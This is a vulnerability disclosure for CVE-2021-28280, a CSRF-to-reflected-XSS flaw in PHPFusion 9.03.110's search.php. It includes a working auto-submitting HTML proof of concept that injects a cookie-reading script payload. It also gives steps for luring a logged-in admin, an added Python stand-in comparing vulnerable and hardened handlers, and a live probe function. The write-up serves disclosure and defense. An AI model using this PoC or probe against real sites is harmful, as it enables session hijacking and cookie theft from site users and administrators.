# CVE-2021-28280: Online Notepad - CSRF to Reflected XSS vulnerability on PHPFusion 9.03.110 CMS
CSRF + Cross-site scripting (XSS) vulnerability in search.php in PHPFusion 9.03.110 allows remote attackers to inject arbitrary web script or HTML.
## Bug Description
search.php in PHPFusion 9.03.110 CMS reflects the `stext` parameter of the advanced search form back into the page without HTML encoding, and the form accepts a cross-site POST with no anti-CSRF token. An attacker can therefore host a page that auto-submits a crafted search on the victim's behalf; the victim's browser attaches their PHPFusion session cookie, and the injected script executes in the context of the PHPFusion site (reflected XSS delivered via CSRF).
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF PoC page using the following code.

```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CSRF to Reflected XSS in PHPFusion search.php</title>
</head>
<body onload="fireForms()">
<script>
// Submit every form on the page as soon as it loads. The victim's browser
// sends the cross-site POST with their PHPFusion session cookie attached.
function fireForms()
{
  var count = document.forms.length;
  for (var i = 0; i < count; i++)
  {
    document.forms[i].submit();
  }
}
</script>
<H2>CSRF to Reflected XSS in PHPFusion search.php</H2>
<!-- search.php echoes stext without encoding: the leading '> closes the
     attribute the value lands in, so the script tag is parsed as markup. -->
<form method="POST" name="form0" action="http://localhost/PHPFusion/search.php">
<input type="hidden" name="stext" value="'><script>alert(document.cookie)</script>"/>
<input type="hidden" name="form_id" value="advanced_search_form"/>
<input type="hidden" name="method" value="OR"/>
<input type="hidden" name="search" value="Search"/>
<input type="hidden" name="stype" value="all"/>
</form>
</body>
</html>
```
2. Replace the form's `action` URL with the path to the target PHPFusion installation.
3. Host the page and send its link to the victim (e.g. a logged-in admin); when they open it, the form is submitted automatically.
4. The injected script executes in the victim's browser in the context of the PHPFusion site (here, `alert(document.cookie)`).
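To make the two defects the PoC relies on concrete, the following is an added example (not PHPFusion code, and written in Python rather than PHP): a miniature stand-in for the search handler that can run either in the vulnerable shape (no anti-CSRF token, raw reflection of `stext`) or in a hardened shape (constant-time token check, HTML-encoded reflection), plus a classifier that tells a tester whether a real response reflects the payload raw, entity-encoded, or not at all. The field name `fusion_token`, the handler names, and the sample token are assumptions chosen for illustration.

```python
"""Added example (not PHPFusion code): vulnerable vs hardened search handler
stand-in, and a reflection check for the CVE-2021-28280 PoC payload."""
import hmac
import html
import urllib.parse
import urllib.request

# Same marker string the PoC submits in `stext`.
PAYLOAD = "'><script>alert(document.cookie)</script>"

# Form fields taken from the PoC's hidden inputs.
POC_FIELDS = {
    "stext": PAYLOAD,
    "form_id": "advanced_search_form",
    "method": "OR",
    "search": "Search",
    "stype": "all",
}


def render_search_form(stext: str, encode: bool) -> str:
    """Echo the submitted term back into the search box, either raw
    (vulnerable: the '> in the payload closes the attribute) or encoded."""
    value = html.escape(stext, quote=True) if encode else stext
    return f'<form method="POST"><input type="text" name="stext" value="{value}"></form>'


def handle_search(form: dict, session_token: str, hardened: bool):
    """Stand-in for the request handler. Returns (http_status, body).
    hardened=False: no token check and raw reflection (what the PoC exploits).
    hardened=True : the POST must carry the session's token (field name
    'fusion_token' is an assumption) and the term is HTML-encoded on output."""
    if hardened:
        supplied = form.get("fusion_token", "")
        if not supplied or not hmac.compare_digest(supplied, session_token):
            return 403, "Invalid or missing form token"
    return 200, render_search_form(form.get("stext", ""), encode=hardened)


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """'raw'     : payload appears verbatim, so the script tag is live markup.
       'encoded' : payload only appears entity-encoded (&lt;script&gt;, &#039; ...).
       'absent'  : the term is not reflected at all."""
    if payload in body:
        return "raw"
    if payload in html.unescape(body):
        return "encoded"
    return "absent"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """Send the PoC's POST to a live instance and classify the reflection.
    Network call; not exercised offline."""
    url = base_url.rstrip("/") + "/search.php"
    data = urllib.parse.urlencode(POC_FIELDS).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return classify_reflection(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    token = "s3cr3t-session-token"  # constructed sample token
    status, body = handle_search(POC_FIELDS, token, hardened=False)
    print(status, classify_reflection(body))  # 200 raw
    status, body = handle_search(POC_FIELDS, token, hardened=True)
    print(status, classify_reflection(body))  # 403 absent
    status, body = handle_search({**POC_FIELDS, "fusion_token": token}, token, hardened=True)
    print(status, classify_reflection(body))  # 200 encoded
```

Against a live target, `probe("http://localhost/PHPFusion")` reports `raw` on the vulnerable build; `encoded` means the term is still echoed but neutralised, and `absent` is what the hardened stand-in returns when the cross-site POST arrives without the token. Note that `html.unescape` accepts both `&#x27;` (Python's encoding of a single quote) and `&#039;` (PHP's), so the classifier works on either server's output.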
## Server Information
Xampp on Windows 10
### PHP Operating System
Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64
### PHP Version
PHP Version 7.4.15
# Vendor Response
The fixes will be included in the next update, patched here:
https://github.com/PHPFusion/PHPFusion/commit/08d6c2ea49bd06fcce32275252f5f25abe61965c
https://github.com/PHPFusion/PHPFusion/commit/fda266c3bb35c650a8c4c51b6923abdfb66ef5cd
https://github.com/PHPFusion/PHPFusion/commit/1c2b32321cf11ed1cd3ff835f8da0d172c849ce6
https://github.com/PHPFusion/PHPFusion/commit/da9f89ae70219f357fba6fffd2dae1ec886d8a3b